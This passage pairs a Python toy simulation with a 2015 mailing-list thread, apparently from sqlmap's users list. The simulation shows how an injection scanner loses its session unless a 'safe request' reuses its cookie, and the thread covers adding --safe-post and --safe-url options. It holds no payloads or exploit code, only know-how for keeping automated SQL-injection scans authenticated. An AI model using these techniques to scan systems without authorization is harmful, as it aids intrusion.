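def session_cookie(req: RawRequest, name: str = "PHPSESSID") -> Optional[str]:
    """Return the value of one cookie from the request's Cookie header, if present."""
    for part in req.headers.get("cookie", "").split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None


class TargetServer:
    """Toy target: a session is dropped once more than `idle_limit` requests
    arrive without a POST /keepalive in between (constructed behaviour)."""

    def __init__(self, idle_limit: int):
        self.idle_limit = idle_limit
        self.sessions: Dict[str, int] = {}  # session id -> probes since last keepalive
        self._issued = 0

    def login(self) -> str:
        """Issue a fresh session id; it never equals the stale one in the file."""
        self._issued += 1
        sid = f"live{self._issued}"
        self.sessions[sid] = 0
        return sid

    def handle(self, method: str, path: str, cookie: Optional[str]) -> int:
        if cookie not in self.sessions:
            return 401
        if method == "POST" and path == "/keepalive":
            self.sessions[cookie] = 0  # keepalive resets the idle counter
            return 200
        self.sessions[cookie] += 1
        if self.sessions[cookie] > self.idle_limit:
            del self.sessions[cookie]  # server-side logout
            return 401
        return 200


def scan(server: TargetServer, probes: int, safe_req: Optional[RawRequest],
         safe_freq: int, reuse_scan_cookie: bool) -> Dict[str, int]:
    """Send `probes` injection-style GETs; after every `safe_freq` of them replay
    `safe_req`, either with the scan's own session cookie or with whatever cookie
    sits in the file. Returns how many probes got 200 versus 401."""
    sid = server.login()
    counts = {"ok": 0, "logged_out": 0}
    for i in range(1, probes + 1):
        status = server.handle("GET", "/item?id=1", sid)
        counts["ok" if status == 200 else "logged_out"] += 1
        if safe_req is not None and i % safe_freq == 0:
            cookie = sid if reuse_scan_cookie else session_cookie(safe_req)
            server.handle(safe_req.method, safe_req.path, cookie)
    return counts


if __name__ == "__main__":
    safe = parse_raw_request(SAFE_REQUEST_FILE)
    for label, req, reuse in [("no safe request", None, True),
                              ("safe request, stale file cookie", safe, False),
                              ("safe request, scan cookie", safe, True)]:
        print(f"{label:32} {scan(TargetServer(idle_limit=5), 20, req, 3, reuse)}")
```

With idle_limit=5 and safe_freq=3, only the run that replays the safe request with the scan's live cookie keeps all 20 probes authenticated; sending no safe request, or sending it with the cookie baked into the file, loses the session after the fifth probe and every later probe comes back 401. That is the failure mode behind the request for the safe request to carry the same cookies as the injection requests.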
From: Miroslav S. <mir...@gm...> - 2015-04-20 21:57:07
|
Done (usage e.g. --safe-url=... --safe-post="foo=bar&...").

Bye

On Mon, Apr 20, 2015 at 10:26 PM, Miroslav Stampar <mir...@gm...> wrote:
> Pushing the patch in a couple of hours.
>
> Bye
>
> On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry <bpe...@gm...> wrote:
>> Ah, good point. Hadn't thought about that. Also, requiring a POST request does make it difficult.

--
Miroslav Stampar
http://about.me/stamparm
|
From: Vojtěch P. <kr...@gm...> - 2015-04-20 20:43:54
|
Definitely, thank you for your lightning response.
Vojta

On 20.4.2015 22:35, Miroslav Stampar wrote:
> --safe-post
>
> is it ok?
>
> On Mon, Apr 20, 2015 at 10:33 PM, Vojtěch Polášek <kr...@gm...> wrote:
>> Okay, thanks, and what exactly is going to be added?
>> Thanks,
>> Vojta
>>
>> On 20.4.2015 22:26, Miroslav Stampar wrote:
>>> Pushing the patch in a couple of hours.
>>>
>>> Bye
>
> --
> Miroslav Stampar
> http://about.me/stamparm
|
From: Miroslav S. <mir...@gm...> - 2015-04-20 20:35:54
|
--safe-post

is it ok?

On Mon, Apr 20, 2015 at 10:33 PM, Vojtěch Polášek <kr...@gm...> wrote:
> Okay, thanks, and what exactly is going to be added?
> Thanks,
> Vojta
>
> On 20.4.2015 22:26, Miroslav Stampar wrote:
>> Pushing the patch in a couple of hours.
>>
>> Bye

--
Miroslav Stampar
http://about.me/stamparm
|
From: Vojtěch P. <kr...@gm...> - 2015-04-20 20:33:25
|
Okay, thanks, and what exactly is going to be added?
Thanks,
Vojta

On 20.4.2015 22:26, Miroslav Stampar wrote:
> Pushing the patch in a couple of hours.
>
> Bye
>
> On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry <bpe...@gm...> wrote:
>> Ah, good point. Hadn't thought about that. Also, requiring a POST request does make it difficult.
>
> --
> Miroslav Stampar
> http://about.me/stamparm
|